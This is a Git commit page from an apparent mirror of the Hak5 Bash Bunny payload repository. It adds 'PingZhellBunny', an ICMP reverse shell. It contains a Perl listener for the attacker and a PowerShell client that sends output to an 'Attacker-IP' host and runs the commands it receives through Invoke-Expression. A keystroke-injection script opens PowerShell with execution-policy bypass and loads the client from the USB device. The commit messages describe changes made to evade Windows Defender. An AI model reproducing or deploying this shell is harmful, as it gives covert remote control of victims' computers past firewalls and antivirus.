hak5
/
bashbunny-payloads
mirror of https://github.com/hak5/bashbunny-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Uploaded PingZhellBunny (#480) 

* Uploaded ReverseBunny

Obfuscated reverse shell via powershell

* Uploaded WifiSnatch

Get your targets stored wifi information and credentials, store them on your Bashbunny and hop away 🐇

* Update ReverseBunny.txt

Changed payload to evade Windows Defender

* Update payload.txt

Added new "Eject Method" - props to Night(9o3)

* Update README.md

* Deleted ReverseBunny.txt

Deleted because of higher risk to get caught by AV

* Updated ReverseBunny to version 1.2

Updated ReverseBunny to version 1.2.
- Deleted payload on disk because of AV
- Added custom shell design

* Updated ReverseBunny to version 1.2

Updated README for ReverseBunny update

* Updated payload

fixed some stupid left overs <3

* Uploaded pingUinBunny

a reverse shell using icmp

* Delete payloads/library/remote_access/switch1 directory

* Uploaded pingUinBunny

A reverse shell using icmp

* Update README.md

* Update README.md

* Updated to PingZhell

* Update Bunny.pl

* Update README.md

* Update README.md

* Update payload.txt

* Rename payloads/library/remote_access/pingUinBunny/Bunny.pl to payloads/library/remote_access/PingZhellBunny/Bunny.pl

* Rename payloads/library/remote_access/pingUinBunny/PingZhell.ps1 to payloads/library/remote_access/PingZhellBunny/PingZhell.ps1

* Rename payloads/library/remote_access/pingUinBunny/README.md to payloads/library/remote_access/PingZhellBunny/README.md

* Rename payloads/library/remote_access/pingUinBunny/payload.txt to payloads/library/remote_access/PingZhellBunny/payload.txt

* Update payload.txt

* Update README.md

* Update README.md

* Update Bunny.pl
pull/482/head
0iphor13 2021-12-23 22:42:21 +01:00 committed by GitHub
parent b5fd8b50fc
commit b64503fe23
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
4 changed files with 232 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

66
payloads/library/remote_access/PingZhellBunny/Bunny.pl Normal file
View File

@ -0,0 +1,66 @@
#!/usr/bin/env perl
#
# icmpsh - simple icmp command shell
# Copyright (c) 2010, Nico Leidecker <nico@leidecker.info>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Modified by 0iphor13 for PingZhell
#
#
#
#
use strict;
use IO::Socket;
use NetPacket::IP;
use NetPacket::ICMP qw(ICMP_ECHOREPLY ICMP_ECHO);
use Net::RawIP;
use Fcntl;
print "Bunny waitin' for connection...\n";
# create raw socket
my $sock = IO::Socket::INET->new(
Proto => "ICMP",
Type => SOCK_RAW,
Blocking => 1) or die "$!";
# set stdin to non-blocking
fcntl(STDIN, F_SETFL, O_NONBLOCK) or die "$!";
print "Let's wait for PingZhell!\n";
my $input = '';
while(1) {
if ($sock->recv(my $buffer, 4096, 0)) {
my $ip = NetPacket::IP->decode($buffer);
my $icmp = NetPacket::ICMP->decode($ip->{data});
if ($icmp->{type} == ICMP_ECHO) {
# get identifier and sequencenumber
my ($ident,$seq,$data) = unpack("SSa*", $icmp->{data});
# write data to stdout and read from stdin
print $data;
$input = <STDIN>;
# compile and send response
$icmp->{type} = ICMP_ECHOREPLY;
$icmp->{data} = pack("SSa*", $ident, $seq, $input);
my $raw = $icmp->encode();
my $addr = sockaddr_in(0, inet_aton($ip->{src_ip}));
$sock->send($raw, 0, $addr) or die "$!\n";
}
}
}

86
payloads/library/remote_access/PingZhellBunny/PingZhell.ps1 Normal file
View File

@ -0,0 +1,86 @@
<#
Original script by nishang - modified by 0iphor13 for PingZhell
Use bunny.pl as a master
When running the master, don't forget to disable ICMP replies by the OS. For example:
$: sysctl -w net.ipv4.icmp_echo_ignore_all=1
Then:
$: perl bunny.pl
Microsoft please don't block, oh dear microsoft corporation
#>
$IPAddress = 'Attacker-IP'
$Delay = 5
$BufferSize = 128
#Basic structure from http://stackoverflow.com/questions/20019053/sending-back-custom-icmp-echo-response
$ICMPClientsWalkinDownTheStreet = New-Object System.Net.NetworkInformation.Ping
$PingOptions = New-Object System.Net.NetworkInformation.PingOptions
$PingOptions.DontFragment = $True
$MicrosoftCopyright =@"
_______ ___ __ _ _______ _______ __ __ _______ ___ ___
| | | | | | | | | | | | | | |
| _ | | |_| | ___|____ | |_| | ___| | | |
| |_| | | | | __ ____| | | |___| | | |
| ___| | _ | || | ______| | ___| |___| |___
| | | | | | | |_| | |_____| _ | |___| | |
|___| |___|_| |__|_______|_______|__| |__|_______|_______|_______|
Windows PowerShell running as user $env:username on $env:computername `n
"@;
# Copyright Copies Right
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($MicrosoftCopyright)
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
#Does a german penguin just PingUin?
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('PS ' + (Get-Location).Path + '> ')
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
while ($true)
{
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes('')
$reply = $ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions)
if ($reply.Buffer)
{
$response = ([text.encoding]::ASCII).GetString($reply.Buffer)
$result = (Invoke-Expression -Command $response 2>&1 | Out-String )
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes($result)
$index = [math]::floor($NeverGonnaGiveYouUp.length/$BufferSize)
$i = 0
#Fragmant larger output into smaller ones to send to the server.
if ($NeverGonnaGiveYouUp.length -gt $BufferSize)
{
while ($i -lt $index )
{
$NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..(($i+1)*$BufferSize-1)]
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
$i +=1
}
$remainingindex = $NeverGonnaGiveYouUp.Length % $BufferSize
if ($remainingindex -ne 0)
{
$NeverGonnaGiveYouUp2 = $NeverGonnaGiveYouUp[($i*$BufferSize)..($NeverGonnaGiveYouUp.Length)]
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp2, $PingOptions) | Out-Null
}
}
else
{
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 10000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
}
$NeverGonnaGiveYouUp = ([text.encoding]::ASCII).GetBytes("`nPS " + (Get-Location).Path + '> ')
$ICMPClientsWalkinDownTheStreet.Send($IPAddress,60 * 1000, $NeverGonnaGiveYouUp, $PingOptions) | Out-Null
}
else
{
Start-Sleep -Seconds $Delay
}
}

41
payloads/library/remote_access/PingZhellBunny/README.md Normal file
View File

@ -0,0 +1,41 @@
**Title: PingZhellBunny**
Author: 0iphor13
Version: 1.3
What is PingZhellBunny?
#
*Imagine a scenario in which communication to and from the server is protected and filtered by a firewall and does not allow TCP shell communication to take place on any listening port (both reverse and bind TCP connection).*
*But many environments allow ping requests to be sent and received. Ping requests work on the ICMP protocol.*
*ICMP stands for Internet Control Message Protocol; it is used by network devices query and error messages. ICMP differs from the widely used TCP and UDP protocols because ICMP is not used for transferring data between network devices.*
*When a device wants to test connectivity to another device, it uses the PING tool (ICMP communication) to send an ECHO REQUEST and waits for an ECHO RESPONSE.*
*The client ICMP agent (Bunny.pl) listens for ICMP packets from a specific host and uses the data in the packet for command execution.*
*The server ICMP Agent (Bunny.pl) sends ICMP packets to connect to the victim running a custom ICMP agent (PingZhell.ps1) and sends it commands to execute.*
#
There you go, a reverse shell.
**Instruction:**
Upload Bunny.pl onto your attacking machine.
Install dependencies, if needed:
- IO::Socket
- NetPacket::IP
- NetPacket::ICMP
Disable ICMP replies by the OS:
*sysctl -w net.ipv4.icmp_echo_ignore_all=1*
Start Bunny.pl -> perl Bunny.pl
#
!!!Insert the IP of your attacking machine into PingZhell.ps1!!!
#
Plug in Bashbunny with PingZhellBunny equipped.
Achieve reverse shell.
run away <3
Credit for code and ideas:
- bdamele
- nishang
- krabelize

39
payloads/library/remote_access/PingZhellBunny/payload.txt Normal file
View File

@ -0,0 +1,39 @@
#!/bin/bash
#
# Title: PingZhellBunny
# Description: Get remote access using a icmp reverse shell.
# Author: 0iphor13
# Version: 1.3
# Category: Remote_Access
# Attackmodes: HID, Storage
LED SETUP
DELAY 500
GET SWITCH_POSITION
DUCKY_LANG de
DELAY 500
ATTACKMODE HID STORAGE
#LED STAGE1 - DON'T EJECT - PAYLOAD RUNNING
LED STAGE1
#After you have adapted the delays for your target, add "-W hidden"
DELAY 5000
RUN WIN "powershell -Exec Bypass -NoP -NonI"
DELAY 6000
Q ENTER
DELAY 20000
Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\PingZhell.ps1')"
DELAY 20000
Q ENTER
DELAY 15000
ATTACKMODE HID
LED FINISH